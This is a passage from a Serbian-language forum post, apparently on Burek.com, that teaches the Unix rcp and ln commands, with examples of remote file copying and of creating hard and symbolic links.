    Ovim se testfile kopira iz home direktorijuma korisnika testuser1 na udaljenom hostu otherhostl u testfile u home direktorijumu korisnika testuser2 na udaljenom hostu otherhost2.
    Ako hocete da kopirate sve fajlove koji se nalaze u direktorijumu /u/testuser/testdir na udaljenom hostu otherhost u tekuci direktorijum na lokalnom hostu, izvrsite komandu:
    rcp testuser@otherhost:/u/testuser/testdir/*
    Ovim se nece kopirati poddirektorijumi koje, mozda, imate u direktorijumu testdir, ili bilo koji fajlovi koji se nalaze u ovim poddirektorijumima. Da biste kopirali sve poddirektorijume i fajlove u ovim poddirektorijumima, upotrebite komandu:
    rcp -r testuser@otherhost:/u/testuser/testdir/*


    ln

    Ponekad je potrebno da se istom fajlu dodele alternativna imena. To se postize linkovanjem imena fajla sa drugim imenom, pomocu ln komande. Moguce je linkovati fajl sa drugim imenom u istom direktorijumu, ili sa istim imenom u drugom direktorijumu.
    Kada se linkuje ime fajla sa nekim drugim imenom fajla, mozete da navedete samo dva argumenta: ime izvornog fajla i ime ciljnog fajla. Kada ime fajla linkujete sa direktorijumom, mozete da navedete vise imena koje linkujete sa istim direktorijumom.
    Ako linkujete koriscenjem hard linkova, ne mozete da linkujete sa fajlom koji se nalazi u drugom fajl sistemu. Ako koristite soft link, prilikom linkovanja mozete da prelazite granice fajl sistema.
    Indikatori koji mogu da se koriste sa ln komandom su sledeci:
    - s za kreiranje soft linka sa drugim fajlom, iii direktorijumom. (linkovan fajl sadrzi ime originalnog fajla); kada se zavrsi operacija linkovanja imena fajla, ime originalnog fajla u linku koristi se kao referenca na originalni fajl.
    - f obezbedjuje da se uputno ime fajla zamenjuje linkovanim imenom fajla, ako fajl postoji.
    Komanda ln, po defailt-u, kreira hard link.

    Primeri
    Ako hocete da linkujete testfilei sa testfile2 u tekucem direktorijumu, izvrsite komandu:
    ln testfilel testfile2
    Ovim se kreira testfile2, koji je linkovan hard linkom sa testfilel. Ako se ukloni jedan od ova dva fajla, drugi ostaje nepromenjen.
    Ukoliko testfile, koji se nalazi u tekucem direktorijumu, treba da bude linkovan sa testfile u direktorijumu /u/testuser/testdir, izvrsite komandu:
    ln testfile /u/testuser/testdir
    Ako hocete da za testfilei u tekucem direktorijumu kreirate simbolicki link, izvrsite komandu:
    ln -s testfilel testfile2
    Ovim se kreira linkovan testfile2, koji sadrzi ime testfilel. Ako uklonite testfilei, ostace sam testfile2 - on nigde ne pokazuje.
    Ako hocete da linkujete sve fajlove koji se nalaze u tekucem direktorijumu sa direktorijumom /u/testuser/testdir, pozovite komandu:
    ln * /u/testuser/testdir/.


    Izvor: Tim 1o1

    IP sačuvana
    social share
    Pogledaj profil WWW
     
    Prijava na forum:
    Ime:
    Lozinka:
    Zelim biti prijavljen:
    Trajanje:
    Registruj nalog:
    Ime:
    Lozinka:
    Ponovi Lozinku:
    E-mail:
    Idi gore
    Stranice:
    Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
    Trenutno vreme je: 29. Mar 2024, 14:15:03
    nazadnapred
    Prebaci se na:  

    Poslednji odgovor u temi napisan je pre više od 6 meseci.  

    Temu ne bi trebalo "iskopavati" osim u slučaju da imate nešto važno da dodate. Ako ipak želite napisati komentar, kliknite na dugme "Odgovori" u meniju iznad ove poruke. Postoje teme kod kojih su odgovori dobrodošli bez obzira na to koliko je vremena od prošlog prošlo. Npr. teme o određenom piscu, knjizi, muzičaru, glumcu i sl. Nemojte da vas ovaj spisak ograničava, ali nemojte ni pisati na teme koje su završena priča.

    web design

    Forum Info: Banneri Foruma :: Burek Toolbar :: Burek Prodavnica :: Burek Quiz :: Najcesca pitanja :: Tim Foruma :: Prijava zloupotrebe

    Izvori vesti: Blic :: Wikipedia :: Mondo :: Press :: Naša mreža :: Sportska Centrala :: Glas Javnosti :: Kurir :: Mikro :: B92 Sport :: RTS :: Danas

    Prijatelji foruma: Triviador :: Domaci :: Morazzia :: TotalCar :: FTW.rs :: MojaPijaca :: Pojacalo :: 011info :: Burgos :: Alfaprevod

    Pravne Informacije: Pravilnik Foruma :: Politika privatnosti :: Uslovi koriscenja :: O nama :: Marketing :: Kontakt :: Sitemap

    All content on this website is property of "Burek.com" and, as such, they may not be used on other websites without written permission.

    Copyright © 2002- "Burek.com", all rights reserved. Performance: 0.225 sec za 16 q. Powered by: SMF. © 2005, Simple Machines LLC.